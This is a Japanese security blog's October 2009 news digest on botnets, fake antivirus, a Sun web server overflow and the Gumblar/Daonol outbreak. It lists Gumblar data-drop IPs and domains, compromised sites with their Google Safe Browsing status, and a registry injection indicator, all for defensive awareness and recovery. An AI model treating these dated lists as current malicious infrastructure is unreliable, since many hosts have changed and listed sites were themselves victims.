バッサリと危険リストに投げ込んで（血のように）真っ赤な警告ウィンドウを出す Googleセンセイのような迅速さが要求されているのではないでしょうか？（苦笑）

----------
エイリアン vs プレデター
じゃあるまいし・・・

DHLやらUPSやらの荷物不達メールに変なTrojanを添付している Bredolabですが、Botnetの雄（イヤな雄ですが・・）である Zbotにケンカをうっている模様・・・
Bredo vs. Zeus: The Battle of the Bots continues
We have seen bots go toe-to-toe with one another before; embedding logic into their armory to block or disable other malware. As such, it comes as no surprise to have seen a recent Bredo sample with additional code to disable installed Zbots. The sample loops through the list of known Zbot executable names…

Botに感染するようなガードの甘いパイはそれなりに少なくなってきているので Botnet同士でパイの奪い合いでもしてるんでしょうか？（嘆息）
もっとも、この両者はイロイロ類似点も多く、単にBredlabの作者（グループ）がZbotの内部を知り尽くしているだけなのかもしれませんが

で、そのZbotですが、MDLのアナリストがインジェクションにこんなメッセージが入っているのを見つけたそうです。
iframes are EVIL! Hate Zeus!
えーっと、何でしたっけ？
「お前が言うな！」
かな？

----------
SUN Java system web server

Sun Java System Web Server Unspecified Buffer Overflow
指標:4 High-Critcal
（いつもの）バッファ・オーバーフローとそれに伴う任意コード実行の可能性です。
The vulnerability is reported in version 7.0U6. Other versions may also be affected.
緩和策等の指示はありません。
Due to the very limited available information, it is not possible to suggest an effective workaround.
とりあえずベンダーの報告待ちですかネ？

----------
Day 25 -- 80 and 443

お馴染み過ぎるPort番号ですが、故に見落としがちな部分もあります。
Cyber Security Awareness Month - Day 25 - Port 80 and 443
インターネット（笑）に普通に接続していると、80および443のセッションは山のように存在し、おそらくはそのパケットの精査などはやっていないでしょう。
しかし、Malware: When <!-- comments --> become commands --2006.02 のようにHTMLコメントに偽装したコマンドなどもあり、完全に信頼できるものなど存在しないと警告しています。

ちなみに、ウチは TCP Monitor Plusのセッションモニターを常に表示して、妙なセッションが張られてないかを気が向いたら監視（というか漠然と見）していますが、コンナノではダメなんでしょうね・・・・

----------
Day 26 -- port1433/1434 MSSQL

Cyber Security Awareness Month - Day 26 port1433/1434 MSSQL
Port 1433 together with port 1434 are the ports most associated with MSSQL or to security people as the Slammer ports.
SQL Slammer Wormの悪夢の話ですね。

----------
DNS-BH New List

10/25 update: 114 new domains blocked
114 new domains added. Sources www.malwareurl.com, tech-linkblog.com, malwaredomainlist.com and others:

and..
rapidshare.com was delisted. （笑）

----------
Firefox 3.6は自動更新？

モジラ、「Firefox 3.6」をマイナーアップデートに位置づけか？--幹部が示唆
Firefox 3.6が3.5からの自動更新で提供される可能性高まるそして、Smedberg氏がわずかに言及しているが、Firefox 3.7 / 4.0の開発をしながら、Firefox 3.5 / 3.6のメンテナンスを続けることによって生じるコストを減らしたいのだ。3.6に一本化できれば、コストはかなり低下する。そうはいっても、このような開発者側の事情が、膨大なユーザーに対し、一時的とはいえかなりの不便を強いることを正当化できるだけのものといえるのか、疑問は残る。

エンジン Gecko 1.9.2はかなり変更されているということでしたので、大丈夫なのかな？という気もしますが、このあたりは多くの開発者の主張を統合しなければならないMozillaと、トップダウンでヤレ！とできる Google(Chrome)の違いなんでしょうね・・たぶん。

----------
Symantec的に・・・

Honor Among Thieves? Definitely Not.
46.9% Norton Antivirus
って部分が一番アタマにきてるのではないかと？（笑）

※注意
Windows Enterprise Defenderは偽アンチウィルスです。

----------
セカイカメラ・テロ

姉ヶ崎寧々エアタグテロ
ラブプラス
これだったのか～!

----------
Google Safe Browsing STATUS:
| 1256587204 | B | [goog-black-hash 1.43063 update]
| 1256587202 | M | [goog-malware-hash 1.16734 update]
| 327070 | current blocked
| 857106 | total logged
EoF

原子力の日 as (第16回原子力ポスターコンクール）
反原子力デー(at 上関原子力発電所)
サーカスの日
柿の日
きしめんの日
建国記念日 オーストリア
----------
いろんな方から、復帰おめでとうと言われて恐縮しております。
こんなサイトですがまだまだ続きそうですので、皆様よろしくお願い致します。

本当は移転する気満々だったのですが、速度がかなり改善されたことと、XMLのエクスポートができないのでもう少しここで居座ります・笑

----------
セキュソフト（？）のセールスマン

「アフィリエイトで配布、月に3000万円稼ぐ会員も」――偽ソフトの実体
偽ソフトの配布方法としては、「作者自身が配布することもあるが、アフィリエイトを使うケースも多い」（シマンテック セキュリティレスポンスシニアマネージャーの浜田譲治氏）。偽ソフトの作者（あるいは作者グループ）は、一般ユーザーを偽ソフト配布サイトへ誘導するためのアフィリエイトを立ち上げ、会員を募集。その会員に配布サイトを宣伝してもらう

こういうのって、ウィルス散布の片棒を担いだら訴追されないんでしょうか？

“業績トップ”のアフィリエイト会員は、月に33万2000ドル（1ドル＝90円で計算すると2988万円）を稼ぐことなどを解説した。
ほんとに払われてるんでしょうかネ？（苦笑）

ちなみに、昨今の「偽セキュリティソフト(FakeAV)」は、「たいして機能をもたない」どころではなく、立派なバックドアとして稼動するものが多く、下手なウィルスよりも性質が悪いです。

----------
Gumblarの情報送信先？

先日ちょっとだけリンクを張っておきましたが、この手の解析に詳しい Fireeye のレポートに、情報送信先の IP が載っています。
Gumblar... Not Gumby!

67.215.246.34 Secured Private Network AS22298
hosted.by.pacificrack.com　という捨てメッセージ有り
収容ドメイン無し

67.212.81.67 Netelligent Hosting Services Inc. AS10929
最近良く目にする防弾ホスト

extrasearch.org	THROUGH
aboutsearch.org	THROUGH
ebidzilla.com	THROUGH

Googleセンセは全スルー

195.24.76.250 ROOT-AS root eSolutionssearch AS44042
おなじみのルクセンブルグの ROOT-ASです
※IP記述ミスでした・ごめんなさい。旅人H様、ご指摘感謝です。

3webinfo.com	THROUGH
4searchtips.org	THROUGH
accadglobal.com	THROUGH
adplaners.com	THROUGH
adplanet.org	THROUGH
askmeguide.com	THROUGH
imutu.com	THROUGH
www.perfectdir.org	THROUGH
searchpoint3.com	THROUGH
thequalityway.net	THROUGH
b079.com	THROUGH

Googleセンセは全スルー

ま～、情報送信先なので、スルーはショウガナイのかも

企業のFirewallでは、このへんはもう I/O 共にブロックしておいて良いかと思います。

----------
岬ちゃん Failed

横→
にリンク張っている Microsoft謹製無料セキュリティーソフト MSE (aka Morro) ですが、ここ１０日ほどデータ更新されていないと問題になっているようです。
Microsoft anti-virus software dawdles over updates

最大で１０日間ほど「古いままの定義ファイル」を最新のものとして表示していたようです。
たまには手動更新しないとダメなのかな？

----------
Van Morrison

ヴァン・モリソン
のオフィシャルサイトがクラックダウン
How long has this been going on? Star’s site infected -- 22nd.Oct
テイクダウン後も再インジェクション
Mal/Iframe-N: The next big threat?

ファンの方は気をつけましょう。
（旧態なインジェクションなので罠を踏みつけて平気なヒトもいますが・・）

----------
ホスティング at オランダ

防弾ホストの所在国といえば、以前はアメリカからロシア・ウクライナあたりに移転して話題になりましたが、昔からシブトク防弾ホストを運営している国がありますね
NL. Netherlands
そう、LEASEWEB でおなじみのトコです。

Interesting attacks from .NL addresses -- 16th Oct
少し前に 8080: インジェクションのホスティングとして LEASEWEBとTRUESERVER、KABELFOONの３つが名指しで挙げられ、StopBADware.orgより
abuse＠leaseweb.comへ
I’ve sent an email to Leaseweb and will continue to hunt for contacts at the other two organizations.
という具合でメール送信したようですが、おそらく返事はこないんじゃないかなぁ・・（苦笑）

More on .NL attacks
もうブロックするしかなさそうです（笑）
ブロックマニアのヒトは LEASEWEBはとっくの昔にBLOCKEDでしょうが・・・

----------
BlockList by DNS-BH

で、ブロックマニアに捧ぐ

Oct 24
scareware domains, botnet domains, fast flux domains
192 new domains to block. Sources include garwarner.blogspot.com, ddanchev.blogspot.com, and secuboxlabs.fr:

Oct 21
Fraud Domains, Trojan Domains, Rogue Domains
Over 200 new rogue, trojan, fraud domains to block. Sources include malwareurl.com, web2secure.com:

----------
月曜の朝なのでこんなもので・・・

----------
Google Safe Browsing STATUS:
| 1256500825 | B | [goog-black-hash 1.42990 update]
| 1256500807 | M | [goog-malware-hash 1.16710 update]
| 330015 | current blocked
| 854437 | total logged

リクエストの日
1936年10月25日にベルリンのドイツ放送でラジオのリクエスト番組が始まった事にちなんで作られた記念日。
民間航空記念日
1951年10月25日に、戦後最初の国内民間航空会社として設立された日本航空が一番機の「もく星号」で東京 - 大阪 - 福岡間の運航を開始したことに由来。
世界パスタデー(World Pasta Association)
ナポリタン好きですか？ (イタリアン (新潟))

----------
X DAY: Oct.2010 by ICANN

JPNICがICANN幹部の「IPv4アドレスの割り振りが2010年10月に終了」発言についてコメント発表
一応反論っぽいもの
ICANN事務総長による「IPv4アドレスの割り振り、2010年10月終了」との発言に関して

IPv4 IPv6 問題は、なんとなく先送りにしてきた観がありますが、実際問題 2010あるいは2011というタイムリミットを突きつけられると、そろそろ何かしておかないといけないのかな？という気になってしまう不思議・・・

ICANNのCEO曰く「IPアドレスの枯渇、Xデーは2010年10月」

NGNのIPv6接続が認可、2011年4月以降サービス開始予定

----------
Gumblar継続中

新Gumblar関連？真っ黒の画面にマウスカーソルだけ
midi?=だけでなくaux?=もですか。
妙というのが判断しづらいですよね……「.拡張子（tmpとか） 」な感じという認識でいいのかな？

す・・すみません。
でも本当に「妙な」としか表現しようがないんですよね・・・

現在判明している「レジストリ・インジェクション」のパターンは
"midi9"="C:\\WINDOWS\\.tmp " (ソース：小野寺さん)

詳細：
XP loads to black screen with mouse, but no keyboard
Trojan-PSW.Win32.Kates.j
ということで、現在は midi9 を使っているようですが、以前も aux1 と aux2 を使ったことのある Gumblarですので、この辺の変更は視野に入れておかないといけないかな？と思ったのです。
実際のトコ、wdmaud.drv とか korgumdd.drv とか、それっぽい名前を使われるのが一番怖かったりします（苦笑）

ちょっとわかりにくい（というかハングルわからない！）ですが、RegEditで見た感染例が以下に載っています（WoTスコアカード評価低いので自己責任で・・・って nProtectのページなんですが・・）
부팅 오작동 증상을 유발하는 악성코드 주의(起動不具合の症状を誘発する悪質なコードの注意 by Google翻訳)
トロイ本体のDropperの名前は iexplore.exe (苦笑)
Drivers32 に設定されるファイルは eisvmyu.tmp, ayndn.bak, diq.dat, hgwcmg.oldなど、ランダム + tmp bak dat old
登録時に Document~1\user\LOCALS~1\Temp のように、マイドキュメントへのフルパスが入っている

というところでしょうか？

"新"Gumblarに注意喚起
・FTPの利用に気をつける（特にパスワード）
といわれましても・・・SFTP/FTPoSSLを許可してるホストが少ないんですよね・・・
martuz型のGumblarはパケットスニファを実装していましたので、どこか１箇所が感染していると、telnet/ftpのような平文送信のサービスはことごとくID/Passwordを抜き取られる恐れがあります。
Inside the Massive Gumblar Attack -- 2009.05.20 Andrew Martin
As mentioned earlier, the malware downloads software to sniff network traffic, winpcap. With the network card in promiscuous mode, the attacker can then capture other FTP credentials from machines on the same subnet.

改ざんサイトの4割が再び被害、Gumbler亜種の活動か
国内60サイト以上が改ざん、Gumblar亜種が台頭か

noooo_spam様の時系列記事：
「Gumblar」（GENOウイルス）再来襲。真っ黒画面にマウスカーソルだけ!
「Gumblar」（GENOウイルス）再来襲。カスペ警告。改ざん被害者も･･･
「Gumblar」（GENOウイルス）再来襲。悪用される脆弱性
「Gumblar」（GENOウイルス）再来襲。オンラインゲームサイト改ざん被害
「Gumblar」（GENOウイルス）再来襲。芸能事務所や財団法人のサイトが改ざん被害
「Gumblar」（GENOウイルス）の改ざん攻撃者に新たな動き [2009年10月]

バリバリー！ -- pluto様 の日記
さようなら、マルゼンスキー。語り継ごう、おまえの強さを
かな？(ちょっと自信ない)

----------
Gumblar vs Google

MDLに"compromized by Gumblar"というカテができていたので、ちょっとGoogleセンセイにお問い合わせ。

werkgruppe-donau.de	THROUGH
bolcsvolgyi.hu	BLOCKED
o0w0o.com	BLOCKED
ozguvenplastik.com	REMOVED
mikyaku.jp	BLOCKED
mifconsulting.net	BLOCKED
red-devil-sport-club.gymdb.com	BLOCKED
asyouwishwed.biz	BLOCKED
siva4kids.org	BLOCKED
lakyrnikcup.cz	BLOCKED
filmkolik.net	THROUGH
psgtech72.com	THROUGH
thalassapromotion.eu	BLOCKED
melstra-techniek.nl	BLOCKED
haydikaradenize.com	BLOCKED
lou-ferrigno.info	BLOCKED
johnson.co.th	BLOCKED
olight-usa.com	BLOCKED
mobydickrock.ru	BLOCKED
thailocal.sru.ac.th	BLOCKED
sunkenlibrary.org	BLOCKED
spin-nds.de	BLOCKED
fotothhi.be	BLOCKED
agag44.com	THROUGH
angelsinuniform.com	BLOCKED
amusecity.com	BLOCKED
hannabarbera.com.br	BLOCKED
usepetrol2earn.com	BLOCKED
kingofbelgrade.com	BLOCKED
ar-global.com	BLOCKED
sksolvesborg.se	BLOCKED
jatulintarhan.net	BLOCKED
agenturadomov.cz	BLOCKED
yondental.co.kr	BLOCKED
myrussia.kz	BLOCKED
uchikawa.ne.jp	THROUGH
magnoliamails.com	THROUGH
transmarecuador.com	BLOCKED
ibdf-deutschland.de	BLOCKED
kcr-net.de	THROUGH
sejoong.tourskorea.com	BLOCKED
bikingrealtor.net	THROUGH
stockbuzzindia.com	BLOCKED
mcsdp.com	THROUGH
bulgaristanuniversiteleri.org	REMOVED
foro.gamesquality.com	THROUGH
kathrynmetcalf.com	THROUGH

もちろん、これら陥落サイト群も被害者なわけですが、Gumblarの恐ろしいところは同時に加害者になってしまう点にあります。

気をつけましょう（何に！？）

----------
MSKKは楽しそう・・

ぶたさんシリーズのWindows 7対応

パソコンを安心して使うために。

Trick or Threat!(念のため、本当はTrick or Treat です)

----------
DM album plugin for Wordpress

周囲に入れてる人が居たので注意喚起
WordPress DM Albums Plugin Multiple Vulnerabilities
delete_album を通して、意図しない削除や悪意コードの注入が行える模様
最新版 2.1.1

----------
Day-23 -- BGP -- Port 179TCP

BGP(Border Gateway Protocol)
Cyber Security Awareness Month - Day 23 port 179 TCP - Border Gateway Protocol

BGPは自律システム(AS)によって管理されるネットワークの集合体にルーティングを行うための外部ルーティングプロトコルで、かつては EGP(Exterior Gateway Protocol)によって管理されていたものです。

BGPのセキュリティ上の懸念のひとつに、BGPハイジャックと呼ばれるものが挙げられます。
［BGP経路ハイジャック］誤った経路に導く，難しい根本対策の徹底
BGP経路ハイジャックについて考える

もうひとつの懸念は、経路情報が失われた際、PBGPセッションが意図せずリセットされてしまう問題です。
CVE-2009-2055
CVE-2009-2056
CVE-2009-1154
これら３つはいずれも CISCOルータの問題ですが、そもそもこうした外向き経路を管理しているルータはCisco製が現在も主流ですのでしかたありません。

いずれにせよ、一般PPLにはあまり縁の無い話ではあります・・・

----------
Day-24 -- small service -- Port 1-20 & 37

Cyber Security Awareness Month - Day 24 - The Small Services
Port 20番以下と 37番は "small service"と呼ばれるもので、現在ではあまり利用頻度が高くなくデフォルトでブロックしているルータも多いです。

Ciscoのルータでは
によってサービスをブロックすることを推奨されています。

21番もヤバいんでしょうけどね・・

----------
NP

Windows 7? No Problem for Trend Micro Users

だそうです

----------
Google Safe Browsing STATUS:
| 1256432416 | B | [goog-black-hash 1.42934 update]
| 1256432412 | M | [goog-malware-hash 1.16691 update]
| 331539 | current blocked
| 852324 | total logged

EoF

国連デー
ツーバイフォー住宅の日
暗黒の木曜日
トリコロール記念日

----------
時間が無いので１個だけ（Favicon作ってる時間も無い）

電話お問い合わせ窓口の混雑について（お詫び）
パソコンの電源を入れても正常に起動せず、マウスカーソルだけが表示されます。
また、Safe Mode（セーフモード）でも起動することができない場合があります。
コンピュータウイルス「Win32/Daonol」に関するご注意
Windows® XPにおいて、起動時に Windows のロゴが表示された後、マウスカーソルのみとなり、その後の操作ができなくなります。 Windows のセーフモードでの起動も出来なくなります 。この現象は、マルウェアが起動中にデットロック状態になるために発生しています。
コンピュータウイルス「Torojan.Win32/Daonol.H」について
主にWindows XPにおいて、起動時、Windowsのロゴが表示された後、マウスポインタのみとなり、その後の操作ができなくなります。
Windowsのセーフモードでの起動も出来なくなります 。

Windowsロゴが出た後、真っ黒の画面にマウスカーソルだけ。
手動システム復元は何度かやったことがありますので、とにかく手順書をメンテ用PCで出しておいて、脳外科手術の開始です。
トリアージ３！？

DELL Vostro 200
起動はするのですが、Windowsロゴの後に画面が真っ暗のまま
先に進まない状態でした。キーボード入力も受け付けないので
その先に進みようがない。さらにはセーフモードでも同じ症状でした。

なんだかとってもイヤな事態になってますね・・

サポセンがパンクするってどんだけ？って感じなのですが、潜伏中だったbotnetが起床に失敗した（注入コードのエラー）のだとしたら、どれだけ深く潜伏してたんだ！？という感じです。

Revenge of Gumblar Zombies
Gumblar... Not Gumby!

とりあえず、真っ暗病になってしまったヒトは、手近なPCに詳しい方に「レジストリ破損時の回復コンソールの使い方がわかる？」と尋ねてみてください。
レジストリの破損により Windows XP を起動できなくなった場合の回復方法
修正すべきレジストリは
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Drivers32]
の aux(nnn)= midi(nnn)= の各エントリに妙なファイルが設定されている部分です。
黒い画面にマウスカーソル (Win32/Daonol)
リンクミス修正　結城様・ご指摘ありがとうございます

----------
出かけてきます